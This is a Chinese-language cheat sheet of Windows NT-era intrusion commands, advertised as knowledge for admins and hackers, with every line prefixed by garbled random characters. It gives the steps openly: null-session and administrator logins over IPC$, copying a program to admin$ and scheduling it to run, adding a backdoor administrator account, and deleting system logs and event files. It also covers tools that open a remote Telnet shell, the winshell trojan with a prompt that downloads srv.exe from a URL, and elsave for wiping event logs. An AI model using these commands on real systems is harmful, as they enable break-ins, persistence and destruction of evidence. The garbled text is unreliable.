网管和黑客都必须知道的命令
M['25[ 常用的几条NET命令:
AKx\U?ei7 seY0"ym&e (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
2g-'.w Y?%MPaN: (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
RBr @dX0gHU[c (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
U#G
uB&V S1uW`zQ!+_ (查看远程主机时间) net time \\IP地址
*7oPM5J|v mkYM/*qyM& (定时启动某个程序) at \\IP地址 02:18 readme.exe
g*t.g@B<2 qMYR\4"$ (查看共享) net view \\IP地址
G39H@@ *O0 QnZR (查看netbios工作组列表) nbtstat -A IP地址
( f8g}2 deaxb8'7 (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
~B>I?j .6!]RA5!= (这两条把自己增加到管理员组): net user 用户名 密码 /add
J&^r}6D 1w+OnJI? net localgroup Administrators 用户名 /add
JeMhiY} ,iCd6M{ (断开连接) net use \\IP地址\ipc$ /delete
o"[P++qd nhk +9 扫尾:
NrVQK}%K dDW],d}B; del C:\winnt\system32\logfiles\*.*
7qon:]b4 U"-mLv"| del C:\winnt\ssytem32\config\*.evt
&N0W! Mp75 L5 del C:\winnt\system32\dtclog\*.*
@^Mn
PM ",E6)r del C:\winnt\system32\*.log
#:T5_9p yHQ.EZ~% del C:\winnt\system32\*.txt
BdUhFN* 5yp~PhHf del C:\winnt\*.txt
;5my(J*b E1 *\)q del C:\winnt\*.log
&gF{<$$ S)VuT0 一、netsvc.exe
5gF}7D@ JC{}iG6r+ 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
y>2v 9;Qp M(Jf&h4b netsvc /list \\IP地址
mwbkXy;8 1}S_CR4XBs netsvc schedule \\IP地址 /query
Y+upZ@Ga )%X\5]w` netsvc \\IP地址 schedule /start
tl ;?/ SZG8@ !_}7 二、OpenTelnet.exe
BOL_kp" 3I:DL#f 远程启动主机的Telnet服务,并绑定端口到7878,例如:
%Tsefs?_ &>I8^i OpenTelnet \\IP地址 用户名 密码 1 7878
'P@a_*I n$`Nx\ v 然后就可以telnet到主机的7878端口,进入DOS方式下:
H=X>o.iVqi zF)_t S telnet IP地址 7878
Btpx[T q,u>`]} 三、winshell.exe
Uj k``; 5F^,7A4I0 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
NWCnt,FlY l[ @\!;| p Path (查看winshell主程序的路径信息)
iCAd7=o ih+kh7J- b reBoot (重新启动机器)
b4%IyJr Syp|s3u; d shutDown (关闭机器)
I_pA)P*Q(6 0)ST_2Ci s Shell (执行后你就会看到可爱的“C:\>”)
+Ya-h~7;g#
C&e x eXit (退出本次登录会话,此命令并不终止winshell的运行)
%Pa-fee `9K'I-hv<8 CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
_tjFb_}Q
5R"b1 四、3389登陆器,GUI方式登录远程主机的
CdZ;ZR &~E=T3 五、elsave.exe
DT 9i<kl C
2oll-kN 事件日志清除工具
^D.B^BR !+>yCy$~_ elsave -s \\IP地址 -l "application" -C
-vjjcyTt JAB]kNvI elsave -s \\IP地址 -l "system" -C
gmLw. |- \Z+v\5nmO elsave -s \\IP地址 -l "security" -C
}ZYK3F J8b]*2D 执行后成功清除应用程序日志,系统日志,安全日志
E&&